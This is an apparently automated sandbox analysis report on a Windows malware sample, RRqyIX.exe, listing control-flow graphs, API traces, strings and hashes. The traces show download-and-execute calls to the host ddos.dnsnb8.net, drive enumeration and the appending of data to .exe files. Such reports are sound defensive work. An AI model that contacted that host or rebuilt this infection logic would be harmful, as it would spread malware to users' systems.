              control_flow_graph 172 ae1099-ae10b4 173 ae10ba-ae10c7 172->173 174 ae1199-ae119c 172->174 175 ae10c8-ae10d4 173->175 176 ae10da 175->176 177 ae1184-ae1190 175->177 178 ae1113-ae1162 call ae185b wsprintfA * 2 URLDownloadToFileA 176->178 177->175 179 ae1196-ae1198 177->179 182 ae10dc-ae110d call ae1000 WinExec lstrlen 178->182 183 ae1168-ae1182 lstrlen Sleep 178->183 179->174 182->178 182->179 183->177 183->178
              APIs
                • Part of subcall function 00AE185B: GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
                • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1878
                • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1880
                • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1890
                • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1894
              • WinExec.KERNEL32(?,00000005), ref: 00AE10F1
              • lstrlen.KERNEL32(00AE4748), ref: 00AE10FA
              • wsprintfA.USER32 ref: 00AE112A
              • wsprintfA.USER32 ref: 00AE1143
              • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00AE115B
              • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00AE1169
              • Sleep.KERNEL32 ref: 00AE1179
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
              • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
              • API String ID: 1280626985-762681358
              • Opcode ID: c351b3643906983e61494b20671df90d57f35ebb617e02975c06937c5e9a6966
              • Instruction ID: b213c2dce80cb99363b756243fdad03395b43eb122538c3ea244bc2c060331dc
              • Opcode Fuzzy Hash: c351b3643906983e61494b20671df90d57f35ebb617e02975c06937c5e9a6966
              • Instruction Fuzzy Hash: EE218C769002D8BADF20DBA2DC88BAEBBBDAB09315F114199E501A7051D7749B85CFA0

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 216 ae1718-ae1733 GetSystemTimeAsFileTime 217 ae1754-ae1758 216->217 218 ae1735-ae1752 SHSetValueA 216->218 219 ae17c6-ae17cd 217->219 220 ae175a-ae1784 SHGetValueA 217->220 218->219 220->219 221 ae1786-ae17b3 call ae2cf0 * 2 220->221 221->219 226 ae17b5 221->226 227 ae17bf 226->227 228 ae17b7-ae17bd 226->228 227->219 228->219 228->227
              APIs
              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE1729
              • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00AE174C
              • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00AE177C
              • __aulldiv.LIBCMT ref: 00AE1796
              • __aulldiv.LIBCMT ref: 00AE17A8
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: TimeValue__aulldiv$FileSystem
              • String ID: C:\Users\user\AppData\Local\Temp\RRqyIX.exe$SOFTWARE\GTplus$Time
              • API String ID: 541852442-3604683582
              • Opcode ID: 85651223135da5671ebb956a246556467843416f515479a4cbdffb1689402a1e
              • Instruction ID: fc84aa5cc9c2bd1ac4c3ddab37bd104ef540d937c0825e23c22959791e38f470
              • Opcode Fuzzy Hash: 85651223135da5671ebb956a246556467843416f515479a4cbdffb1689402a1e
              • Instruction Fuzzy Hash: 98116072A00299BBEF109B96CCC9FEF7BBCEB44B14F108515FA10A7180D6B19A458B60

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 229 ae6076-ae6079 230 ae607b-ae6080 229->230 231 ae60e0-ae60eb 229->231 233 ae60f7-ae60f8 230->233 234 ae6082-ae6085 230->234 232 ae60ee-ae60f4 231->232 235 ae60f6 232->235 237 ae60fe-ae6106 233->237 238 ae60fa-ae60fc call ae66c8 233->238 234->235 236 ae6087 234->236 235->233 236->232 239 ae6089-ae6095 236->239 241 ae6108-ae611d 237->241 242 ae6155-ae6189 VirtualFree 237->242 238->237 243 ae6097-ae609f 239->243 244 ae60a1-ae60aa 239->244 246 ae611f-ae6121 241->246 251 ae618c-ae6192 242->251 243->244 249 ae61ba-ae61c8 244->249 250 ae60b0-ae60c1 VirtualAlloc 244->250 247 ae6123 246->247 248 ae6151-ae6154 246->248 247->248 252 ae6125-ae6128 247->252 248->242 255 ae61ca-ae61d7 249->255 256 ae6243-ae6251 249->256 253 ae60c7-ae60cf 250->253 251->253 254 ae6198-ae61b0 VirtualFree 251->254 258 ae612a-ae612e 252->258 259 ae6134-ae613b 252->259 253->251 260 ae60d5-ae60df VirtualAlloc 253->260 254->249 263 ae61b2-ae61b4 254->263 257 ae61dd-ae61e0 255->257 261 ae6264-ae626f 256->261 262 ae6253 256->262 257->256 265 ae61e2-ae61f2 257->265 258->259 272 ae6130-ae6132 258->272 259->272 273 ae613d-ae614f 259->273 260->231 264 ae6271-ae6276 261->264 268 ae6255-ae6258 262->268 263->249 269 ae627c-ae6289 264->269 270 ae6389-ae63b1 VirtualProtect 264->270 271 ae61f5-ae61fe 265->271 268->261 274 ae625a-ae6262 268->274 285 ae628b 269->285 286 ae6292-ae6298 269->286 277 ae63b7-ae63ba 270->277 275 ae620c-ae6219 271->275 276 ae6200-ae6203 271->276 272->246 273->246 274->268 281 ae6238-ae623f 275->281 279 ae621b-ae6228 276->279 280 ae6205-ae6208 276->280 282 ae63fc-ae63ff VirtualProtect 277->282 283 ae63bc-ae63c2 277->283 279->281 287 ae622a-ae6236 280->287 288 ae620a 280->288 281->271 290 ae6241 281->290 284 ae6400-ae6416 282->284 283->283 289 ae63c4 283->289 291 ae6418-ae641d 284->291 292 ae6420-ae6425 284->292 285->286 293 ae62a2-ae62ac 286->293 287->281 288->281 289->282 294 ae63c6-ae63cf 289->294 290->257 295 ae62ae 293->295 296 ae62b1-ae62c8 293->296 297 ae63d4-ae63d8 294->297 298 ae63d1 294->298 295->296 299 ae62ce-ae62d4 296->299 300 ae6373-ae6384 296->300 301 ae63dd-ae63e1 297->301 302 ae63da 297->302 298->297 303 ae62da-ae62f1 299->303 304 ae62d6-ae62d9 299->304 300->264 305 ae63e7-ae63fa VirtualProtect 301->305 306 ae63e3 301->306 302->301 308 ae6365-ae636e 303->308 309 ae62f3-ae62f9 303->309 304->303 305->277 305->282 306->305 308->293 310 ae62fb-ae630f 309->310 311 ae6314-ae6326 309->311 312 ae6426-ae64a9 310->312 313 ae634c-ae6360 311->313 314 ae6328-ae634a 311->314 323 ae64ab-ae64c0 312->323 324 ae6519-ae651c 312->324 313->312 314->308 330 ae6535-ae6537 323->330 331 ae64c2 323->331 325 ae651d-ae651e 324->325 326 ae6583-ae6587 324->326 329 ae6522-ae6533 325->329 328 ae6588-ae658b 326->328 332 ae658d-ae658f 328->332 333 ae65a1-ae65a3 328->333 329->330 334 ae659a 330->334 335 ae6539 330->335 336 ae64f8 331->336 337 ae64c5-ae64cd 331->337 338 ae6591-ae6593 332->338 341 ae659b-ae659d 334->341 339 ae653b-ae6541 335->339 340 ae65b4 335->340 344 ae656c-ae656f 336->344 345 ae64fa-ae64fe 336->345 342 ae64cf-ae64d4 337->342 343 ae6542-ae6545 337->343 338->341 346 ae6595 338->346 339->343 351 ae65be-ae6608 340->351 341->338 347 ae659f 341->347 348 ae64d6-ae64d9 342->348 349 ae6517-ae6518 342->349 350 ae654d-ae6550 343->350 352 ae6572 344->352 345->352 353 ae6500 345->353 346->334 347->328 348->350 355 ae64db-ae64f5 348->355 349->324 350->351 356 ae6552-ae6556 350->356 357 ae6573-ae6576 352->357 353->329 358 ae6502 353->358 355->336 359 ae6578-ae657f 356->359 360 ae6558-ae6569 356->360 357->359 358->357 361 ae6504-ae6513 358->361 359->326 360->344 361->330 363 ae6515 361->363 363->349
              APIs
              • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00AE60BE
              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00AE60DF
              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00AE6189
              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00AE61A5
              Memory Dump Source
              • Source File: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: Virtual$AllocFree
              • String ID:
              • API String ID: 2087232378-0
              • Opcode ID: e116db1bc47e51f5c2e8587e30b44ff4f7770dee733a513c56739a779e919742
              • Instruction ID: 5a2c8e0b09a00d56a98a9e97c8bdaf1600ca5daa1098a5679113ed5144d7d432
              • Opcode Fuzzy Hash: e116db1bc47e51f5c2e8587e30b44ff4f7770dee733a513c56739a779e919742
              • Instruction Fuzzy Hash: C31235B26087C58FDB328F25CC45BEA3BB0EF22350F1849AED9858B193D774A901C761

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 365 ae2b8c-ae2bc6 memset GetLogicalDriveStringsA 366 ae2bc8-ae2bcc 365->366 367 ae2c09-ae2c28 WaitForMultipleObjects 365->367 370 ae2bce-ae2bd0 366->370 371 ae2bfa-ae2c07 lstrlen 366->371 368 ae2c3c-ae2c45 367->368 369 ae2c2a-ae2c3a CreateThread 367->369 369->368 370->371 372 ae2bd2-ae2bdc GetDriveTypeA 370->372 371->366 371->367 372->371 373 ae2bde-ae2be1 372->373 373->371 374 ae2be3-ae2bf6 CreateThread 373->374 374->371
              APIs
              • memset.MSVCRT ref: 00AE2BA6
              • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00AE2BB4
              • GetDriveTypeA.KERNEL32(?), ref: 00AE2BD3
              • CreateThread.KERNEL32(00000000,00000000,00AE2B7D,?,00000000,00000000), ref: 00AE2BEE
              • lstrlen.KERNEL32(?), ref: 00AE2BFB
              • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00AE2C16
              • CreateThread.KERNEL32(00000000,00000000,00AE2845,00000000,00000000,00000000), ref: 00AE2C3A
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
              • String ID:
              • API String ID: 1073171358-0
              • Opcode ID: 2e0c942bc4b8b981c766f20cfeeb4ab60f0b67c4d4b2a65324a9f8f7b3e4ad72
              • Instruction ID: 5c7f5fa6c7ad3377ff9feec38fd6f4694aab5d2a9f2356503f26d261d9a6ed46
              • Opcode Fuzzy Hash: 2e0c942bc4b8b981c766f20cfeeb4ab60f0b67c4d4b2a65324a9f8f7b3e4ad72
              • Instruction Fuzzy Hash: 5321D2B28001CCAFEB20EFA5AC88EEE7B6DFB44344B240529F842D3151D7248E07CB61

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 16 ae1e6e-ae1e95 call ae2d60 19 ae1e9c-ae1eaa call ae1df6 16->19 20 ae1e97 call ae1d8a 16->20 24 ae2332 19->24 25 ae1eb0-ae1ed9 SetFileAttributesA CreateFileA 19->25 20->19 27 ae2338-ae233b 24->27 25->24 26 ae1edf-ae1f28 call ae1915 SetFilePointer CreateFileMappingA MapViewOfFile 25->26 26->24 36 ae1f2e-ae1f39 26->36 29 ae233d-ae2340 UnmapViewOfFile 27->29 30 ae2346-ae2349 27->30 29->30 32 ae234b-ae234e FindCloseChangeNotification 30->32 33 ae2350-ae2354 30->33 32->33 34 ae2356-ae235b CloseHandle 33->34 35 ae2391-ae239a call ae2d9b 33->35 34->35 36->24 38 ae1f3f-ae1f56 36->38 38->24 40 ae1f5c-ae1f64 38->40 40->24 41 ae1f6a-ae1f70 40->41 41->24 42 ae1f76-ae1f87 call ae1c81 41->42 42->24 45 ae1f8d-ae1fa7 call ae185b call ae1c81 42->45 45->24 50 ae1fad-ae1fb4 45->50 51 ae1fb6-ae1fc5 call ae1af9 50->51 52 ae2024-ae2045 50->52 51->52 60 ae1fc7-ae1fd2 51->60 52->24 53 ae204b-ae204e 52->53 55 ae2070-ae20f4 call ae1af9 * 2 call ae1c68 * 2 memset * 2 53->55 56 ae2050-ae2053 53->56 78 ae20f5-ae20fe 55->78 58 ae2056-ae205a 56->58 58->55 61 ae205c-ae2061 58->61 60->24 63 ae1fd8-ae1fe7 60->63 61->24 64 ae2067-ae206e 61->64 66 ae1fef-ae2006 call ae1af9 63->66 67 ae1fe9-ae1fec 63->67 64->58 73 ae2008-ae200e call ae1c68 66->73 74 ae2013-ae201e FlushViewOfFile 66->74 67->66 73->74 74->52 79 ae2130-ae2139 78->79 80 ae2100-ae2114 78->80 83 ae213c-ae2142 79->83 81 ae212d-ae212e 80->81 82 ae2116-ae212a 80->82 81->78 82->81 84 ae215c 83->84 85 ae2144-ae2150 83->85 88 ae215f-ae2162 84->88 86 ae2157-ae215a 85->86 87 ae2152-ae2154 85->87 86->83 87->86 89 ae2164-ae2171 88->89 90 ae2181-ae2184 88->90 93 ae232a-ae232d 89->93 94 ae2177-ae217e 89->94 91 ae218d-ae21ba call ae1c68 90->91 92 ae2186 90->92 97 ae21bc-ae21d0 call ae1c68 91->97 98 ae21d3-ae220b call ae1c81 call ae1c68 91->98 92->91 93->88 94->90 97->98 105 ae220d-ae2218 call ae1c68 98->105 106 ae221b-ae221e 98->106 105->106 107 ae2226-ae2328 memcpy UnmapViewOfFile FindCloseChangeNotification call ae1b8a call ae185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call ae1915 FindCloseChangeNotification 106->107 108 ae2220-ae2223 106->108 107->27 108->107
              APIs
              • SetFileAttributesA.KERNEL32(?,00000080,?,00AE32B0,00000164,00AE2986,?), ref: 00AE1EB9
              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00AE1ECD
              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00AE1EF3
              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00AE1F07
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00AE1F1D
              • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00AE201E
              • memset.MSVCRT ref: 00AE20D8
              • memset.MSVCRT ref: 00AE20EA
              • memcpy.MSVCRT ref: 00AE222D
              • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE2238
              • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE224A
              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22C6
              • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22CB
              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22DD
              • WriteFile.KERNEL32(000000FF,00AE4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22F7
              • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE230D
              • FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE2322
              • UnmapViewOfFile.KERNEL32(?,?,00AE32B0,00000164,00AE2986,?), ref: 00AE2340
              • FindCloseChangeNotification.KERNEL32(?,?,00AE32B0,00000164,00AE2986,?), ref: 00AE234E
              • CloseHandle.KERNEL32(000000FF,?,00AE32B0,00000164,00AE2986,?), ref: 00AE2359
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: File$CloseView$ChangeFindNotificationPointer$CreateUnmapWritememset$AttributesFlushHandleMappingmemcpy
              • String ID:
              • API String ID: 307705342-0
              • Opcode ID: 57fa3112764aafa2be2202a48dfc8c6dcf09fdbdb31155607f27782a19ae9171
              • Instruction ID: 192fe4ab05526d6434d55aca0447c1b400ed0a6c7f411602258ddaf383850f7c
              • Opcode Fuzzy Hash: 57fa3112764aafa2be2202a48dfc8c6dcf09fdbdb31155607f27782a19ae9171
              • Instruction Fuzzy Hash: D2F17D71900299EFCF20DFA5DD85AADBBB9FF08314F104529E519AB6A1D730AE81CF50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 117 ae1973-ae199a PathFileExistsA 118 ae1ac7-ae1acc 117->118 119 ae19a0-ae19aa 117->119 120 ae1ace 118->120 121 ae1ad0-ae1ad5 118->121 122 ae19af-ae19c2 CreateFileA 119->122 120->121 123 ae1ad7-ae1ad9 121->123 124 ae1af0-ae1af6 121->124 125 ae1a28-ae1a36 GetFileSize 122->125 126 ae19c4-ae19d3 Sleep 122->126 123->124 127 ae1a38-ae1a3b 125->127 128 ae1a87-ae1a8b 125->128 126->122 129 ae19d5-ae1a0b call ae185b wsprintfA CopyFileA 126->129 127->128 130 ae1a3d-ae1a51 VirtualAlloc 127->130 131 ae1a8d-ae1a90 FindCloseChangeNotification 128->131 132 ae1a96-ae1a9a 128->132 129->125 143 ae1a0d-ae1a26 CreateFileA 129->143 130->128 134 ae1a53-ae1a57 130->134 131->132 135 ae1a9c 132->135 136 ae1aad-ae1ab1 132->136 138 ae1a59-ae1a6d ReadFile 134->138 139 ae1a80 134->139 140 ae1aa0-ae1aa7 DeleteFileA 135->140 141 ae1adb-ae1ae0 136->141 142 ae1ab3-ae1ab6 136->142 138->128 145 ae1a6f-ae1a7e 138->145 139->128 140->136 146 ae1ae7-ae1aec 141->146 147 ae1ae2-ae1ae5 141->147 142->118 148 ae1ab8-ae1ac1 VirtualFree 142->148 143->125 144 ae1a9e 143->144 144->140 145->138 145->139 146->124 149 ae1aee 146->149 147->146 148->118 149->124
              APIs
              • PathFileExistsA.SHLWAPI(00AE4E5C,00000000,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE1992
              • CreateFileA.KERNEL32(00AE4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AE19BA
              • Sleep.KERNEL32(00000064), ref: 00AE19C6
              • wsprintfA.USER32 ref: 00AE19EC
              • CopyFileA.KERNEL32(00AE4E5C,?,00000000), ref: 00AE1A00
              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE1A1E
              • GetFileSize.KERNEL32(00AE4E5C,00000000), ref: 00AE1A2C
              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AE1A46
              • ReadFile.KERNEL32(00AE4E5C,00AE4E60,00000000,?,00000000), ref: 00AE1A65
              • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00AE1A90
              • DeleteFileA.KERNEL32(?), ref: 00AE1AA7
              • VirtualFree.KERNEL32(00AE4E60,00000000,00008000), ref: 00AE1AC1
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
              • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\RRqyIX.exe
              • API String ID: 2523042076-1261205569
              • Opcode ID: edd084a32271b4e6d57236eccb1982c35f87e1ca873b4b14548695e4cc15753a
              • Instruction ID: 9736ec814f0ba57ab24b1904f4f9fef0c096a11739bdbe126b3136f4c745cc5b
              • Opcode Fuzzy Hash: edd084a32271b4e6d57236eccb1982c35f87e1ca873b4b14548695e4cc15753a
              • Instruction Fuzzy Hash: 04512A719012A9AFCF20DF9ADDC8ABEBBB9EB04394F104579E515A7190D3709E41CB90

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 150 ae28b8-ae28ff memset wsprintfA 151 ae29db-ae29df 150->151 152 ae2905-ae290d 150->152 152->151 153 ae2913-ae2919 152->153 154 ae291b-ae294c memset wsprintfA call ae29e2 153->154 155 ae2956-ae2965 strrchr 153->155 158 ae2951 154->158 155->151 157 ae2967-ae2978 lstrcmpiA 155->157 159 ae297a-ae2981 call ae1e6e 157->159 160 ae2988-ae2992 lstrcmpiA 157->160 158->151 163 ae2986 159->163 160->151 162 ae2994-ae299b 160->162 164 ae29ad-ae29c9 strstr 162->164 165 ae299d-ae29a3 162->165 163->151 167 ae29cb-ae29d1 call ae239d 164->167 168 ae29d3-ae29d6 call ae2692 164->168 165->164 166 ae29a5-ae29a7 lstrcpy 165->166 166->164 167->151 168->151
              APIs
              • memset.MSVCRT ref: 00AE28D3
              • wsprintfA.USER32 ref: 00AE28F7
              • memset.MSVCRT ref: 00AE2925
              • wsprintfA.USER32 ref: 00AE2940
                • Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2A02
                • Part of subcall function 00AE29E2: wsprintfA.USER32 ref: 00AE2A1A
                • Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2A44
                • Part of subcall function 00AE29E2: lstrlen.KERNEL32(?), ref: 00AE2A54
                • Part of subcall function 00AE29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00AE2A6C
                • Part of subcall function 00AE29E2: strrchr.MSVCRT ref: 00AE2A7C
                • Part of subcall function 00AE29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00AE2A9F
                • Part of subcall function 00AE29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00AE2AAE
                • Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2AC6
                • Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2ADA
                • Part of subcall function 00AE29E2: FindFirstFileA.KERNEL32(?,?), ref: 00AE2AEF
                • Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2B13
              • strrchr.MSVCRT ref: 00AE2959
              • lstrcmpiA.KERNEL32(00000001,exe), ref: 00AE2974
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
              • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
              • API String ID: 3004273771-1791786966
              • Opcode ID: 3eb34a63df4f66bc542582a99ab58ade5452c7c198bc1423d8fb9d6068df27d4
              • Instruction ID: d0c4d69c88845e2481cd0b2f6993d9b0ce943976e5bb634b777aea5b5a69b44b
              • Opcode Fuzzy Hash: 3eb34a63df4f66bc542582a99ab58ade5452c7c198bc1423d8fb9d6068df27d4
              • Instruction Fuzzy Hash: E331D97294039D7BDF20E7A6DC89FDA776CAF14310F040852F585A7082E6B4DAC58BA0

              Control-flow Graph

              APIs
              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00AE164F
              • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00AE165B
              • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\RRqyIX.exe,00000104), ref: 00AE166E
              • CreateThread.KERNEL32(00000000,00000000,00AE1099,00000000,00000000,00000000), ref: 00AE16AC
              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00AE16BD
                • Part of subcall function 00AE139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE13BC
                • Part of subcall function 00AE139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00AE13DA
                • Part of subcall function 00AE139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00AE1448
              • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE16E5
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\RRqyIX.exe$C:\Windows\system32$Documents and Settings
              • API String ID: 123563730-1868831291
              • Opcode ID: 8acde555bfc3b8534750bc82d137fdabf21fb1febcbe9af35c316a10e37069b0
              • Instruction ID: 780cb21829624f6e00962e6189ee4f860cca1e86c8b96ab84bfbf5f04d849007
              • Opcode Fuzzy Hash: 8acde555bfc3b8534750bc82d137fdabf21fb1febcbe9af35c316a10e37069b0
              • Instruction Fuzzy Hash: EA11B6725012F4BBDF21A7E79DCDEEB3E6DEB49761F000051F2099A0A0D6708A41CBB1

              Control-flow Graph

              • Executed
